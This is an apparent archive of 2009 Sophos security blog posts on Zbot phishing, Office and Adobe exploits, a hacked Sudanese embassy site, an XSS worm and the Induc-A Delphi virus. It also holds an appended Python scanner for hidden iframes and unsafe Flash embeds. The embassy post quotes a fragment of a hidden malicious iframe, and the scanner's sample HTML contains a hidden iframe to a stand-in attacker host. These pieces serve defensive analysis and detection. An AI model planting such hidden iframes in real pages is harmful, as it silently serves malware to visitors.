Sophos

Archive for the ‘Exploits’ Category

November’s Patch-Tuesday roundup…

This month’s “Patch Tuesday” includes 6 security updates - of which Microsoft has rated 3 as Critical (all remote code execution vulnerabilities) and 3 Important (two remote code execution vulnerabilities and one denial of service).

Mention-worthy updates this month include MS09-065 and MS09-068.

MS09-065 addresses several kernel vulnerabilities. The vulnerability of particular concern is related to specially crafted Embedded OpenType fonts, and could be exploited to run unauthorized code in the system context.

Most remote code execution vulnerabilities we see typically run in the user context at the same privilege level as the currently authenticated user. Now, if you’re the user this means that all your files are at risk, but the system itself is reasonably safe (unless your administrator hasn’t been adhering to best practices, and has granted you administrative privileges … in which case you’ve pretty much granted the attacker’s code access to the entire box). With this kernel-mode driver remote code execution vulnerability, the current user’s privilege level is irrelevant. It doesn’t matter how unprivileged the current user is - the unauthorized code has unfettered access to the local system. Assuming, that is, the attacker doesn’t destabilize the system and BSOD before their code runs. Kernel vulnerabilities have a habit of not just bringing down processes, but bringing down entire boxes.

MS09-068 is mention-worthy, as it addresses issues in Microsoft Word, for both the Windows AND Apple platforms. Windows users that have automatic updates configured will automatically have protection provided to them - but Apple users will have to rely on the Microsoft Office Update Utility “Microsoft AutoUpdate” or go to here, here or here, to download the relevant update.

You can find the rest of our analysis here.

And, as always, if you’ve found our vulnerability posts to be valuable, or have some suggestions for how we can better serve you, please let us know at sophosblog@sophos.com


From Server/Outlook update to FDIC to facebook phish: now with a twist

In the past few weeks, the authors behind Zbot have been busy. Around October 12 we saw the server upgrade spam with links. Later, on the 14th, we saw the same campaign with the malware attached to similar-looking server upgrade notices. By the 22nd of October, the spam messages were touting Outlook updates.

For a few days during the past week, the group has turned their attention to the Federal Deposit Insurance Corporation (FDIC), spamming out links to malware sites with the message below:

With the global economy as it is, notice of bank failures would certainly draw a lot of attention and irrational behavior. After all, the thought of hard-earned money being gone forever is going to scare a lot of people. Of course, downloading the “personal FDIC insurance file” would give nothing but grief. The bank deposits are still safe, but the computer would probably get infected.

After the blast of FDIC messages, the Zbot authors turned to facebook as their latest platform to spread malware. However, they added a twist to it. The messages are well-crafted to look like a real Facebook message:

The message asks the user to update their facebook account. The new twist is that, when they get to the linked site, there is no link to download an executable yet. Instead, they’re shown a fake Facebook login page:

Victims who have entered their facebook login would get their account details phished, probably for the purpose of spreading more malware. Since this is not a real facebook page, any random login info would bring you to this next page:

It is on this page that the malware author provides an executable for download. This file, updatetool.exe, is a Zbot executable that is proactively detected as Mal/EncPk-LE.

With the creative social engineering that the Zbot authors have been using, users should be really careful when reading messages, whether in an email or from a social network. Avoiding clicking links directly, manually typing the address to access the site, and not executing downloaded files would do a lot to protect one’s computer.


Malicious update for Microsoft Outlook / Outlook Express (KB910721)

This morning as I trawled the spam queues a sense of deja-vu descended on me when this subject line caught my eye:

         Update for Microsoft Outlook / Outlook Express (KB910721)

Didn’t I see this a while ago and didn’t it contain a rather nasty Trojan? 

The format of the October version differs slightly in that it includes a link to a website from which you may download the ‘Microsoft/Outlook/Outlook Express Update’ rather than an attached executable.

The details have also been updated:

Quick Details

  • File Name: officexp-KB910721-FullFile-ENU.exe
  • Version: 1.5
  • Date Published: Wed, 21 Oct 2009 16:05:06 +0100
  • Language: English
  • File Size: 100 KB

Fake Microsoft Outlook security update

Of course this is not a Microsoft security update, but rather simply another attempt by the malware authors to fool you into installing their Trojan. Once again.

The advice from Sophos remains the same. Visit the genuine Microsoft update site in order to obtain your fixes.


Update on the Adobe vulnerability

On Friday, SophosLabs posted news about a new Adobe Reader vulnerability believed to be in the wild (CVE-2009-3459, security posting from Adobe here). Since then a few more details have surfaced.

Readers may have seen reports of a malicious PDF in the wild exploiting this vulnerability. Sophos products already detect and block this sample as Troj/PDFJs-DS.

If the malicious PDF successfully exploits CVE-2009-3459, it attempts to infect the victim with a backdoor Trojan. The executable payload is detected by Sophos as Mal/Generic-A, and the backdoor Trojan (DLL) the executable installs is detected as Troj/Protux-Gen.

Testing thus far (with Adobe Reader 9.1.3 and 9.1.0) suggests that successful exploitation is unreliable: so far we have only observed the Reader application crashing. Customers should stay alert for tomorrow’s security update from Adobe to patch this issue.


‘Phished’ Password list:- A quick analysis

The Disney song “The Wonderful Thing About Tiggers” has the lyric:

I’m the only one!
I-I-I-I’m…..the only one!

Except, it seems, when we are talking about passwords in the latest list of ‘phished’ * passwords. Thanks to the people on the Neowin blog for pointing me at the data. After a quick analysis of the list, some of the most popular passwords are:

neopets
123456
monkey
123321
tigger
password
princess
pokemon
kitty
casper
123456789
neopet
anime
iloveyou

As well as being insecure, these passwords suggest a preoccupation with children’s popular culture. I would advise that parents not only change their passwords and check their computer security, but that they also ensure their kids change their passwords on their email accounts as well as any online forums they belong to.

* There is some debate in SophosLabs about these recent password lists as to whether they are the result of traditional spam phishes or other things.

Personally, I think that this data is a combination of

  • some phishing emails
  • keylogger data
  • and a rogue social networking application phishing information

However this password list was compiled, all users should follow a password routine.

Simple tips for better web password security from SophosLabs on Vimeo.


YAE: Yet Another Embassy — The Republic of Sudan in London


Monitoring our queues yesterday I thought that I saw a fake Sudanese Embassy website serving malware (Mal/Iframe-F). The press release headings were strange:

  • Who is Blackmailing Whom?
  • ICC – Europe’s Guantanamo?
  • Sudan and ICC
  • National Elections Commission


The suggestion that the International Criminal Court was like Guantanamo was not something I had heard before. So I went to the WHOIS of the site to see who owned the site:

Registrant's address:
60 Chambers Lane
London
NW10 2RL
United Kingdom

NW10 stands for the postcode area North West 10 i.e. Willesden Green. Not where you would traditionally think of Embassies being based in London.

The contact details were correct though:

Embassy of the Republic of the Sudan
3 Cleveland Row
St. James’s
London
SW1A 1DD

Curiouser and curiouser. Looking through search engine results on the site it appears that the site is that of the Embassy of Sudan in London!

So why had the site come up in the queues?

Well it contains an iframe with the following code:

.cn/in.cgi?id1000" width=1 height=1 style="visibility: hidden">

This malicious iframe is very small and will download further malware from a Chinese website.

Like other embassies that have been hit, Ethiopia, India etc., the Sudanese haven’t been targeted deliberately but are victims of poor security.


Back with a vengeance: Fresh MS06-028 malicious PowerPoint documents

We have seen a few malicious PowerPoint documents come through the labs in the past few days. These malicious documents exploit the MS06-028 vulnerability, for which a patch has been available since June 21… 2006. Yes, that’s right — a patch has been available for more than 3 years.

If you were one of the responsible ones, having patched your system at some point before now, then by opening one of these malicious documents, you would see the following:

Though if you saw this message, it is debatable how responsible you are — you let yourself be coerced into opening a malicious PPT on your machine.

For the completely irresponsible out there — not having patched your system and remaining blissfully unaware of the many recent zero-day Microsoft Office vulnerabilities — when you double-clicked one of these malicious PPT’s, you would notice a brief flicker on-screen before seeing the PowerPoint open a presentation to the following first slide:

Despite the fact that PowerPoint is now displaying a valid PPT file, you can be sure the malicious payload Troj/Protux-Gen has been dropped on your machine. The screen flicker is caused by the shellcode, which drops and runs another executable Troj/ReopnPPT-A that kills any open PowerPoint processes, removes the shellcode from the malicious PPT and re-opens PowerPoint with the newly disinfected presentation.

Sophos detects the malicious documents as Troj/ExpPPT-G. Clever buffer overflow protection mechanisms cannot help defend against these documents, since the exploit takes advantage of unchecked data in file parsing logic. In short, the vulnerability allows a pointer into the memory-mapped image of the PPT file to be calculated and subsequently called.

For extra peace of mind, you can also check your PPT documents before opening them using Microsoft’s OffVis tool for parsing Office documents, which was released to the public about a month ago. It detects the exploitation of several MS Office vulnerabilities, and indeed displays the following when examining a Troj/ExpPPT-G sample:

But this is all moot because you have already patched your system, right?


Phishing via snail mail - Shishing?

UPDATE: This appears to have been a pen-test.

There are reports (via ISC) that US Banking institutions have been subject to phishing attempts via snail mail.

Reportedly, the Credit Unions receive a package containing a letter from the NCUA and a CD with training material on it. If indeed the training material is actually malware, then one would suspect it is most likely to consist of some backdoor Trojan or a keylogger.

The NCUA press release gives slightly more information on this threat, with some instructions on what to do if you do receive the letter:

  • You should contact your NCUA Regional Office
  • or the NCUA Fraud Hotline at 1-800-827-9650

In addition to this advice, please contact your AV supplier and forward them a copy of the CD.

You can contact Sophos via:

Sophos Inc.
3 Van de Graaff Drive
2nd Floor
Burlington, MA
01803
USA

Tel: 781-494-5800
Fax: 781-494-5801


XSS worm targeting Chinese website

For the last few days we have seen an XSS worm outbreak on renren.com, a facebook-like website in China.

The worm itself poses as a flash file for the “Pink Floyd - Wish You Were Here” video, which tries to execute an external javascript file. The first line of the worm is a friendly greeting:

/ I’m not a malicious worm.^^;

The technique used in this worm exploits a simple XSS hole in the website, with a payload which has a flash component with the AllowScriptAccess=”always” attribute to allow the above “non-malicious” javascript to spread the worm via renren.com’s API.

This is the same technique used back in 2007 by the Okurt worm.

We now detect the worm as W32/PinkRen-A.
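Both the hidden 1x1 iframe on the Sudanese embassy site above and the AllowScriptAccess=”always” Flash component in this worm are things a site owner can check their own pages for. The following Python scanner is an added example, not Sophos code; the site and embed hostnames in the sample HTML are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

def _px(value):
    m = re.match(r"\s*(\d+)", value or "")  # missing or non-numeric size counts as large
    return int(m.group(1)) if m else 10**6

class RiskyEmbedScanner(HTMLParser):
    """Flags hidden external iframes and Flash embeds with allowScriptAccess=always."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self._check_iframe(a)
        elif tag in ("embed", "object") and a.get("allowscriptaccess", "").lower() == "always":
            self.findings.append(("flash-allowscriptaccess", a.get("src") or a.get("data", "")))
        elif (tag == "param" and a.get("name", "").lower() == "allowscriptaccess"
              and a.get("value", "").lower() == "always"):
            self.findings.append(("flash-allowscriptaccess", "<param>"))

    def _check_iframe(self, a):
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        tiny = _px(a.get("width")) <= 1 and _px(a.get("height")) <= 1
        # A visible, normally sized third-party iframe (video, ads) is not flagged.
        if (hidden or tiny) and host and host != self.site_host:
            self.findings.append(("hidden-external-iframe", src))

def scan(html, site_host):
    """Return the (kind, src) findings for one page served from site_host."""
    p = RiskyEmbedScanner(site_host)
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample: a benign video iframe, a hidden 1x1 iframe to an external host,
# a Flash embed with allowScriptAccess="always" and one restricted to sameDomain.
SAMPLE_HTML = """
<iframe src="http://video.example/embed/123" width="425" height="344"></iframe>
<iframe src="http://evil.example/in.cgi?id1000" width=1 height=1 style="visibility: hidden"></iframe>
<embed src="http://cdn.example/wish_you_were_here.swf" allowScriptAccess="always">
<embed src="http://cdn.example/safe.swf" allowScriptAccess="sameDomain">
"""
```

Running scan(SAMPLE_HTML, "embassy.example") reports the hidden external iframe and the always-access Flash embed, and nothing for the two benign elements.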


Compile-a-virus - W32/Induc-A

Here’s something you don’t see every day - a virus that infects Delphi files … at compile-time.

When a file infected with W32/Induc-A runs, it looks to see if it can find a Delphi installation on the current machine. If it finds one, it tries to write malicious code to SysConst.pas, which it then compiles to SysConst.dcu (after saving the old copy of this file to SysConst.bak). The new infected SysConst.dcu file will then add W32/Induc-A code to every new Delphi file that gets compiled on the system - some of the strings from the inserted code look like this:

Induc-A

If you find detections of this in 3rd-party software, you might want to contact your suppliers to let them know they need to have a look at their system … and also take care to check machines you might have with Delphi installed.

There’s a classic paper called Reflections on Trusting Trust, that concludes that you can’t trust code that you didn’t write yourself from the very lowest level - this is a great example of where compiling the code yourself doesn’t necessarily mean that it’s clean.

Update: Please be aware - this virus isn’t just a threat if you are a software developer who uses Delphi. It’s possible that you are running programs which are written in Delphi on your computers, and they could be affected. Sophos has received thousands of reports of programs infected by W32/Induc-A. Learn more on Graham Cluley’s blog.